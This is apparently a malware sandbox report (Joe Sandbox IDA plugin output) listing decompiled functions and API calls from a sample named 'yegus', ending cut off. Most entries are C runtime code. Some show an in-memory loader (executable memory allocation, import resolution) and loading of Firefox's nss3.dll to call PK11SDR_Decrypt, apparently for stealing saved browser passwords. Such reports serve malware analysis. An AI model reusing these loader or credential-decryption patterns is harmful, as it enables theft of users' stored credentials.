    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10086EA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • TlsAlloc.KERNEL32 ref: 10086EE6
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01336CA2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
    C-Code - Quality: 68%
    			E01336CA2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t6;
				intOrPtr* _t10;

				_t6 = E01336A96(8, "InitializeCriticalSectionEx", 0x1340360, "InitializeCriticalSectionEx"); // executed
				_t10 = _t6;
				if(_t10 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				L0133489C();
				return  *_t10(_a4, _a8, _a12);
			}





    0x01336cb7
    0x01336cbc
    0x01336cc3
    0x00000000
    0x01336cdf
    0x01336cd0
    0x00000000

    APIs
      • Part of subcall function 01336A96: GetProcAddress.KERNEL32(00000000,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24,01347C08,00000FA0), ref: 01336AFA
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 01336CDF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100044A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?), ref: 100044AF
    Strings
    • failed to allocate %u bytes of memory, xrefs: 100044BE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A35C, Relevance: 3.2, APIs: 2, Instructions: 168
    C-Code - Quality: 90%
    			E0133A35C(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t77;
				signed int _t80;
				signed char* _t81;
				short* _t82;
				int _t86;
				signed char _t87;
				signed int _t88;
				signed int _t90;
				signed int _t91;
				int _t93;
				int _t94;
				intOrPtr _t96;
				signed int _t97;

				_t92 = __edi;
				_t48 =  *0x1347004; // 0x262637d3
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t77 = E01339F2F(__eflags, _a4);
				if(_t77 != 0) {
					_push(__edi);
					_t93 = 0;
					__eflags = 0;
					_t80 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x13471c8)) - _t77;
						if( *((intOrPtr*)(_t51 + 0x13471c8)) == _t77) {
							break;
						}
						_t80 = _t80 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t80;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t77 - 0xfde8;
							if(_t77 == 0xfde8) {
								L23:
							} else {
								__eflags = _t77 - 0xfde9;
								if(_t77 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t77 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t77,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x134825c - _t93; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E01339FA2(_t96);
												goto L37;
											}
										} else {
											E01336200(_t93, _t96 + 0x18, _t93, 0x101);
											 *(_t96 + 4) = _t77;
											 *(_t96 + 0x21c) = _t93;
											_t77 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t93;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t72[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L16;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t96 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *(_t96 + 0x21c) = E01339EF1( *(_t96 + 4));
												 *(_t96 + 8) = _t77;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0133A007(_t90, _t96); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t92);
						goto L39;
					}
					E01336200(_t93, _t96 + 0x18, _t93, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x13471d8;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t81 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t81[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t91 =  *_t81 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t63;
									if(_t91 > _t63) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t31 = _t93 + 0x13471c4; // 0x8040201
										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t31;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t63 = _t81[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t81 =  &(_t81[2]);
								__eflags =  *_t81;
								if( *_t81 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t93 = _t93 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t93 - 4;
					} while (_t93 < 4);
					 *(_t96 + 4) = _t77;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E01339EF1(_t77);
					_t82 = _t96 + 0xc;
					_t90 = _v36 + 0x13471cc;
					_t94 = 6;
					do {
						_t58 =  *_t90;
						_t90 = _t90 + 2;
						 *_t82 = _t58;
						_t82 = _t82 + 2;
						_t94 = _t94 - 1;
						__eflags = _t94;
					} while (_t94 != 0);
					goto L36;
				} else {
					E01339FA2(_t96);
				}
				L39:
				return E01333E82(_t77, _v8 ^ _t97, _t92, _t96);
			}
































    0x0133a35c
    0x0133a364
    0x0133a36b
    0x0133a373
    0x0133a37b
    0x0133a380
    0x0133a390
    0x0133a391
    0x0133a391
    0x0133a393
    0x0133a395
    0x0133a397
    0x0133a39a
    0x0133a39a
    0x0133a3a0
    0x00000000
    0x00000000
    0x0133a3a6
    0x0133a3a7
    0x0133a3aa
    0x0133a3ad
    0x0133a3b2
    0x00000000
    0x0133a3b4
    0x0133a3b4
    0x0133a3ba
    0x0133a488
    0x0133a3c0
    0x0133a3c0
    0x0133a3c6
    0x00000000
    0x0133a3cc
    0x0133a3d0
    0x0133a3d6
    0x0133a3d8
    0x00000000
    0x0133a3de
    0x0133a3e3
    0x0133a3e9
    0x0133a3eb
    0x0133a475
    0x0133a47b
    0x00000000
    0x0133a47d
    0x0133a47e
    0x00000000
    0x0133a47e
    0x0133a3f1
    0x0133a3fb
    0x0133a400
    0x0133a408
    0x0133a40e
    0x0133a40f
    0x0133a412
    0x0133a465
    0x0133a414
    0x0133a414
    0x0133a418
    0x0133a41b
    0x0133a41d
    0x0133a41d
    0x0133a420
    0x0133a422
    0x00000000
    0x00000000
    0x0133a424
    0x0133a427
    0x0133a432
    0x0133a432
    0x0133a434
    0x00000000
    0x00000000
    0x0133a42c
    0x0133a431
    0x0133a431
    0x0133a431
    0x0133a436
    0x0133a439
    0x0133a43c
    0x00000000
    0x00000000
    0x00000000
    0x0133a43c
    0x0133a41d
    0x0133a43e
    0x0133a43e
    0x0133a441
    0x0133a446
    0x0133a446
    0x0133a449
    0x0133a44a
    0x0133a44a
    0x0133a44a
    0x0133a45a
    0x0133a460
    0x0133a460
    0x0133a46d
    0x0133a46e
    0x0133a46f
    0x0133a533
    0x0133a534
    0x0133a539
    0x0133a53a
    0x0133a53a
    0x0133a3eb
    0x0133a3d8
    0x0133a3c6
    0x0133a3ba
    0x0133a53c
    0x00000000
    0x0133a53c
    0x0133a49a
    0x0133a4a2
    0x0133a4a2
    0x0133a4a6
    0x0133a4a9
    0x0133a4af
    0x0133a4b2
    0x0133a4b2
    0x0133a4b5
    0x0133a4b7
    0x0133a4b9
    0x0133a4b9
    0x0133a4bc
    0x0133a4be
    0x00000000
    0x00000000
    0x0133a4c0
    0x0133a4c3
    0x0133a4df
    0x0133a4df
    0x0133a4e1
    0x00000000
    0x00000000
    0x0133a4c8
    0x0133a4ce
    0x0133a4d0
    0x0133a4d6
    0x0133a4da
    0x0133a4da
    0x0133a4db
    0x00000000
    0x0133a4db
    0x00000000
    0x0133a4ce
    0x0133a4e3
    0x0133a4e6
    0x0133a4e9
    0x00000000
    0x00000000
    0x00000000
    0x0133a4e9
    0x0133a4eb
    0x0133a4eb
    0x0133a4ee
    0x0133a4ef
    0x0133a4f2
    0x0133a4f5
    0x0133a4f5
    0x0133a4fb
    0x0133a4fe
    0x0133a50d
    0x0133a516
    0x0133a51b
    0x0133a521
    0x0133a522
    0x0133a522
    0x0133a525
    0x0133a528
    0x0133a52b
    0x0133a52e
    0x0133a52e
    0x0133a52e
    0x00000000
    0x0133a382
    0x0133a383
    0x0133a389
    0x0133a53d
    0x0133a54c

    APIs
      • Part of subcall function 01339F2F: GetOEMCP.KERNEL32(00000000), ref: 01339F5A
      • Part of subcall function 01339F2F: GetACP.KERNEL32(00000000), ref: 01339F71
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0133A1FD,?,00000000), ref: 0133A3D0
    • GetCPInfo.KERNEL32(00000000,0133A1FD,?,?,?,0133A1FD,?,00000000), ref: 0133A3E3
      • Part of subcall function 0133A007: GetCPInfo.KERNEL32(?,?), ref: 0133A02C
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10088EC0, Relevance: 3.2, APIs: 2, Instructions: 168
    APIs
      • Part of subcall function 10088A93: GetOEMCP.KERNEL32(00000000,?,?,10088D1C,?), ref: 10088ABE
      • Part of subcall function 10088A93: GetACP.KERNEL32(00000000,?,?,10088D1C,?), ref: 10088AD5
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10088D61,?,00000000), ref: 10088F34
    • GetCPInfo.KERNEL32(00000000,10088D61,?,?,?,10088D61,?,00000000), ref: 10088F47
      • Part of subcall function 10088B6B: GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10088B90
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01332520, Relevance: 3.1, APIs: 2, Instructions: 132library
    C-Code - Quality: 84%
    			E01332520(void* __ecx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t33;
				struct HINSTANCE__* _t38;
				signed int _t40;
				signed short _t42;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				intOrPtr _t45;
				signed int _t47;
				void* _t53;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t68;
				signed short* _t70;
				struct HINSTANCE__* _t75;
				signed short* _t77;
				void* _t80;
				void* _t81;
				signed short _t93;

				_t53 = __ecx;
				_t33 =  *((intOrPtr*)(__ecx + 0xc0));
				if(_t33 == 0 ||  *((intOrPtr*)(__ecx + 0xc4)) == 0) {
					return 0;
				} else {
					_t56 =  *((intOrPtr*)(__ecx + 0x144)) + _t33;
					_v8 = _t56;
					_t57 =  *((intOrPtr*)(_t56 + 0xc));
					if(_t57 == 0) {
						L25:
						return 0;
					} else {
						while(1) {
							_t38 = LoadLibraryA( *((intOrPtr*)(_t53 + 0x144)) + _t57); // executed
							_t75 = _t38;
							_v16 = _t75;
							if(_t75 == 0) {
								break;
							}
							_t40 =  *(_t53 + 0x154);
							if( *(_t53 + 0x150) < _t40) {
								_t68 = _v12;
								goto L14;
							} else {
								if(_t40 == 0) {
									_t47 = 0x10;
								} else {
									_t47 = _t40 + _t40;
								}
								 *(_t53 + 0x154) = _t47;
								_push(_t47 << 2);
								_t68 = E01336EBC(_t57);
								_t81 = _t80 + 4;
								_v12 = _t68;
								if(_t68 == 0) {
									return 3;
								} else {
									_t62 =  *(_t53 + 0x150);
									if( *(_t53 + 0x150) != 0) {
										E0133F490(_t68,  *((intOrPtr*)(_t53 + 0x14c)), _t62 << 2);
										_t81 = _t81 + 0xc;
									}
									E01336EB7( *((intOrPtr*)(_t53 + 0x14c)));
									_t80 = _t81 + 4;
									 *((intOrPtr*)(_t53 + 0x14c)) = _t68;
									L14:
									_t58 = _v8;
									 *(_t68 +  *(_t53 + 0x150) * 4) = _t75;
									 *(_t53 + 0x150) =  *(_t53 + 0x150) + 1;
									_t64 =  *((intOrPtr*)(_t53 + 0x144));
									_t70 =  *((intOrPtr*)(_t58 + 0x10)) + _t64;
									_t77 = _t70;
									if( *((intOrPtr*)(_t58 + 4)) == 0) {
										L17:
										_t42 =  *_t77;
										_t93 = _t42;
										if(_t93 == 0) {
											L24:
											_t59 = _t58 + 0x14;
											_v8 = _t59;
											_t57 =  *((intOrPtr*)(_t59 + 0xc));
											if(_t57 != 0) {
												continue;
											} else {
												goto L25;
											}
										} else {
											L18:
											L18:
											if(_t93 >= 0) {
												_t43 = _t42 +  *((intOrPtr*)(_t53 + 0x144)) + 2;
											} else {
												_t43 = _t42 & 0x0000ffff;
											}
											_t44 = GetProcAddress(_v16, _t43);
											 *_t70 = _t44;
											if(_t44 == 0) {
												break;
											}
											_t42 = _t77[2];
											_t77 =  &(_t77[2]);
											_t70 =  &(_t70[2]);
											if(_t42 != 0) {
												goto L18;
											} else {
												_t58 = _v8;
												goto L24;
											}
										}
									} else {
										_t45 =  *_t58;
										if(_t45 == 0) {
											return 8;
										} else {
											_t77 = _t45 + _t64;
											goto L17;
										}
									}
								}
							}
							goto L30;
						}
						return 6;
					}
				}
				L30:
			}



























    0x01332527
    0x01332529
    0x01332531
    0x01332696
    0x01332544
    0x0133254a
    0x0133254c
    0x01332551
    0x01332556
    0x01332663
    0x0133266b
    0x01332560
    0x01332560
    0x01332569
    0x0133256f
    0x01332571
    0x01332576
    0x00000000
    0x00000000
    0x0133257c
    0x01332588
    0x013325e9
    0x00000000
    0x0133258a
    0x0133258c
    0x01332592
    0x0133258e
    0x0133258e
    0x0133258e
    0x01332597
    0x013325a0
    0x013325a6
    0x013325a8
    0x013325ab
    0x013325b0
    0x01332677
    0x013325b6
    0x013325b6
    0x013325be
    0x013325cb
    0x013325d0
    0x013325d0
    0x013325d9
    0x013325de
    0x013325e1
    0x013325ec
    0x013325f2
    0x013325f5
    0x013325f8
    0x01332601
    0x01332607
    0x0133260d
    0x0133260f
    0x0133261a
    0x0133261a
    0x0133261c
    0x0133261e
    0x01332652
    0x01332652
    0x01332655
    0x01332658
    0x0133265d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01332620
    0x00000000
    0x01332620
    0x01332620
    0x01332630
    0x01332622
    0x01332622
    0x01332622
    0x01332636
    0x0133263c
    0x01332640
    0x00000000
    0x00000000
    0x01332642
    0x01332645
    0x01332648
    0x0133264d
    0x00000000
    0x0133264f
    0x0133264f
    0x00000000
    0x0133264f
    0x0133264d
    0x01332611
    0x01332611
    0x01332615
    0x01332683
    0x01332617
    0x01332617
    0x00000000
    0x01332617
    0x01332615
    0x0133260f
    0x013325b0
    0x00000000
    0x01332588
    0x0133268f
    0x0133268f
    0x01332556
    0x00000000

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 01332569
    • GetProcAddress.KERNEL32(?,?), ref: 01332636
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 01332800, Relevance: 3.1, APIs: 2, Instructions: 118
    C-Code - Quality: 77%
    			E01332800(void* __edx, intOrPtr* _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v68;
				intOrPtr _v196;
				char _v380;
				intOrPtr _v384;
				intOrPtr* _v388;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				void* _t48;
				void* _t49;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr _t58;
				void* _t69;
				void* _t70;
				char* _t72;
				void* _t85;
				intOrPtr* _t87;
				void* _t88;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				void* _t92;

				_push(0xfffffffe);
				_push(0x1345a68);
				_push(E01335F20);
				_push( *[fs:0x0]);
				_t91 = _t90 - 0x174;
				_t45 =  *0x1347004; // 0x262637d3
				_v12 = _v12 ^ _t45;
				_t46 = _t45 ^ _t89;
				_v32 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v20;
				_v28 = _t91;
				_t69 = __edx;
				_t87 = _a8;
				_v388 = _t87;
				_v384 = 0;
				_v68 = 0;
				_v48 = 0;
				_v40 = 0;
				_v44 = 0;
				_v36 = 0;
				_v8 = 0;
				_v8 = 1;
				_t48 = E01332050( &_v380, __edx);
				_t92 = _t91 + 4;
				if(_t48 == 0) {
					_t72 =  &_v380;
					_t49 = E01332200(_t72); // executed
					if(_t49 != 0) {
						goto L1;
					} else {
						_v8 = 2;
						_push(_t72);
						_t54 = E013322C0( &_v380, _t69);
						_t92 = _t92 + 8;
						if(_t54 != 0 || E013323E0( &_v380) != 0) {
							goto L1;
						} else {
							_t56 = E01332520( &_v380); // executed
							if(_t56 != 0) {
								goto L1;
							} else {
								_t57 = E013326A0( &_v380); // executed
								if(_t57 != 0) {
									goto L1;
								} else {
									_t58 = E01332760( &_v380); // executed
									if(_t58 != 0) {
										goto L1;
									} else {
										if(_t87 != 0) {
											_v8 = 3;
											 *_t87 = 0x20;
											 *((intOrPtr*)(_t87 + 4)) = _t58;
											 *((intOrPtr*)(_t87 + 8)) = _v56;
											 *((intOrPtr*)(_t87 + 0xc)) = _v52;
											 *((intOrPtr*)(_t87 + 0x10)) = _v36;
											 *((intOrPtr*)(_t87 + 0x14)) = _v196;
											 *((intOrPtr*)(_t87 + 0x18)) = _v48;
											 *((intOrPtr*)(_t87 + 0x1c)) = _v44;
											_v8 = 2;
										}
										_v384 = 1;
										E013368B0(_t89, 0x1347004,  &_v20, 0xfffffffe);
									}
								}
							}
						}
					}
				} else {
					L1:
					E013368B0(_t89, 0x1347004,  &_v20, 0xfffffffe);
				}
				 *[fs:0x0] = _v20;
				_pop(_t85);
				_pop(_t88);
				_pop(_t70);
				return E01333E82(_t70, _v32 ^ _t89, _t85, _t88);
			}









































    0x01332803
    0x01332805
    0x0133280a
    0x01332815
    0x01332816
    0x0133281c
    0x01332821
    0x01332824
    0x01332826
    0x0133282c
    0x01332830
    0x01332836
    0x01332839
    0x0133283b
    0x0133283e
    0x01332844
    0x0133284e
    0x01332855
    0x0133285c
    0x01332863
    0x0133286a
    0x01332871
    0x01332878
    0x01332886
    0x0133288b
    0x01332892
    0x013328ae
    0x013328b4
    0x013328bd
    0x00000000
    0x013328bf
    0x013328bf
    0x013328c6
    0x013328ce
    0x013328d3
    0x013328da
    0x00000000
    0x013328ed
    0x013328f3
    0x013328fc
    0x00000000
    0x013328fe
    0x01332904
    0x0133290d
    0x00000000
    0x0133290f
    0x01332915
    0x0133291e
    0x00000000
    0x01332924
    0x01332926
    0x01332928
    0x0133292f
    0x01332935
    0x0133293b
    0x01332941
    0x01332947
    0x01332950
    0x01332956
    0x0133295c
    0x0133295f
    0x0133295f
    0x01332966
    0x0133297b
    0x01332983
    0x0133291e
    0x0133290d
    0x013328fc
    0x013328da
    0x01332894
    0x01332894
    0x0133289f
    0x013328a7
    0x01332a4a
    0x01332a52
    0x01332a53
    0x01332a54
    0x01332a62

    APIs
      • Part of subcall function 01332200: VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040), ref: 01332256
      • Part of subcall function 01332200: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0133228B
      • Part of subcall function 01332520: LoadLibraryA.KERNEL32(?), ref: 01332569
      • Part of subcall function 01332520: GetProcAddress.KERNEL32(?,?), ref: 01332636
      • Part of subcall function 013326A0: VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 01332714
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 0133297B
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 0133289F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10001670, Relevance: 3.0, APIs: 2, Instructions: 44string
    APIs
    • lstrlenA.KERNEL32(?,00000000,00000000,10001CC5,00000000), ref: 10001677
    • SetCurrentDirectoryA.KERNELBASE(00000000), ref: 10001691
      • Part of subcall function 100015B0: LoadLibraryA.KERNEL32(nss3.dll), ref: 100015B6
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSS_Init,?), ref: 100015D3
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 100015E0
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 100015ED
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 100015FA
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 10001607
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 10001614
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 10001621
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A61E, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 100%
    			E0133A61E(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0133A5E7(_t19) - _t19 >> 1) + (E0133A5E7(_t19) - _t19 >> 1);
					_t6 = E0133883E(_t14, (E0133A5E7(_t19) - _t19 >> 1) + (E0133A5E7(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0133F490(_t18, _t19, _t12);
					}
					E01338804(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







    0x0133a61e
    0x0133a628
    0x0133a62c
    0x0133a63d
    0x0133a641
    0x0133a646
    0x0133a64c
    0x0133a651
    0x0133a656
    0x0133a65b
    0x0133a662
    0x0133a62e
    0x0133a62e
    0x0133a62e
    0x0133a66d

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0133A622
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
      • Part of subcall function 01338804: HeapFree.KERNEL32(00000000,00000000), ref: 0133881A
      • Part of subcall function 01338804: GetLastError.KERNEL32(?,?,0133AF4C,?,00000000,?,00000000,?,0133AF73,?,00000007,?,?,0133B3D5,?,?), ref: 0133882C
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0133A662
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 01333570, Relevance: 3.0, APIs: 2, Instructions: 25
    C-Code - Quality: 100%
    			E01333570(long __ecx, void** __edx) {
				void* _t4;
				void* _t8;
				void** _t9;

				_t8 = __ecx;
				_t9 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L4:
					return 0;
				} else {
					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
					if(_t4 == 0) {
						goto L4;
					} else {
						_t9[1] = _t8;
						 *_t9 = _t4;
						return 1;
					}
				}
			}






    0x01333572
    0x01333574
    0x01333578
    0x013335a0
    0x013335a3
    0x0133357e
    0x01333588
    0x01333590
    0x00000000
    0x01333592
    0x01333592
    0x01333595
    0x0133359e
    0x0133359e
    0x01333590

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
    • RtlAllocateHeap.NTDLL(00000000), ref: 01333588
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100825D0, Relevance: 3.0, APIs: 2, Instructions: 14
    APIs
